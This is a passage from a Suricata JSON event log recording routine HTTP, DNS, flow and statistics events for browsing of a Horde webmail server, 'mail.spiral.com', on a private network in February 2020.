Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:00:12.311477+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:00:14.000165+0000","event_type":"stats","stats":{"uptime":13666,"capture":{"kernel_packets":131707,"kernel_drops":0},"decoder":{"pkts":131749,"bytes":91582877,"invalid":175,"ipv4":130334,"ipv6":8,"ethernet":131749,"raw":0,"null":0,"sll":0,"tcp":125405,"udp":4740,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2645,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2661,"synack":2652,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1693,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2159,"failed_udp":106},"tx":{"http":4372,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2235}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2209,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":174216,"memcap":0}}} {"timestamp":"2020-02-29T00:00:14.001000+0000","flow_id":1593959677759463,"event_type":"flow","src_ip":"192.168.10.122","src_port":32817,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:13.724967+0000","end":"2020-02-28T23:55:13.836542+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:16.606407+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58242,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":10,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.229309+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} {"timestamp":"2020-02-29T00:00:17.231489+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52626,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.316883+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:00:17.808975+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57151,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:18.056280+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318}} {"timestamp":"2020-02-29T00:00:18.115962+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":0}} {"timestamp":"2020-02-29T00:00:18.119305+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:00:19.000671+0000","flow_id":1343567395055843,"event_type":"flow","src_ip":"192.168.10.130","src_port":34674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1164,"bytes_toclient":643,"start":"2020-02-28T23:59:12.944355+0000","end":"2020-02-28T23:59:18.097765+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:21.000249+0000","event_type":"stats","stats":{"uptime":13673,"capture":{"kernel_packets":131776,"kernel_drops":0},"decoder":{"pkts":131789,"bytes":91594733,"invalid":175,"ipv4":130374,"ipv6":8,"ethernet":131789,"raw":0,"null":0,"sll":0,"tcp":125441,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2210,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":6,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":75516,"memcap":0}}} {"timestamp":"2020-02-29T00:00:21.001336+0000","flow_id":481520212261976,"event_type":"flow","src_ip":"192.168.10.130","src_port":34670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":2135,"bytes_toclient":6655,"start":"2020-02-28T23:58:44.932952+0000","end":"2020-02-28T23:59:20.376358+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:21.747956+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:00:23.124284+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":1}} {"timestamp":"2020-02-29T00:00:24.004707+0000","flow_id":682082286951048,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-28T23:55:23.449160+0000","end":"2020-02-28T23:55:23.561958+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:25.000767+0000","flow_id":1255138313859760,"event_type":"flow","src_ip":"192.168.10.130","src_port":34676,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1894,"bytes_toclient":6334,"start":"2020-02-28T23:59:19.094896+0000","end":"2020-02-28T23:59:24.514097+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:28.000202+0000","event_type":"stats","stats":{"uptime":13680,"capture":{"kernel_packets":131791,"kernel_drops":0},"decoder":{"pkts":131794,"bytes":91595063,"invalid":175,"ipv4":130379,"ipv6":8,"ethernet":131794,"raw":0,"null":0,"sll":0,"tcp":125446,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":23758,"memcap":0}}} {"timestamp":"2020-02-29T00:00:31.230446+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29261,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:31.463043+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:31.478809+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:34.000269+0000","flow_id":153157065063796,"event_type":"flow","src_ip":"192.168.10.122","src_port":45902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:33.474484+0000","end":"2020-02-28T23:55:33.585976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:35.000227+0000","event_type":"stats","stats":{"uptime":13687,"capture":{"kernel_packets":131794,"kernel_drops":0},"decoder":{"pkts":131808,"bytes":91602696,"invalid":175,"ipv4":130393,"ipv6":8,"ethernet":131808,"raw":0,"null":0,"sll":0,"tcp":125458,"udp":4746,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2648,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2664,"synack":2655,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1696,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2162,"failed_udp":106},"tx":{"http":4376,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2238}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19177,"memcap_state":0,"memcap_global":0},"http":{"memuse":79802,"memcap":0}}} {"timestamp":"2020-02-29T00:00:36.479921+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52634,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:37.879535+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4163,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:38.081444+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:38.092418+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:41.000850+0000","flow_id":812859747239381,"event_type":"flow","src_ip":"192.168.10.122","src_port":57389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:40.689621+0000","end":"2020-02-28T23:55:40.802671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:42.000177+0000","event_type":"stats","stats":{"uptime":13694,"capture":{"kernel_packets":131820,"kernel_drops":0},"decoder":{"pkts":131829,"bytes":91610721,"invalid":175,"ipv4":130412,"ipv6":8,"ethernet":131829,"raw":0,"null":0,"sll":0,"tcp":125475,"udp":4748,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2649,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2665,"synack":2656,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1697,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2163,"failed_udp":106},"tx":{"http":4377,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2239}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2212,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19176,"memcap_state":0,"memcap_global":0},"http":{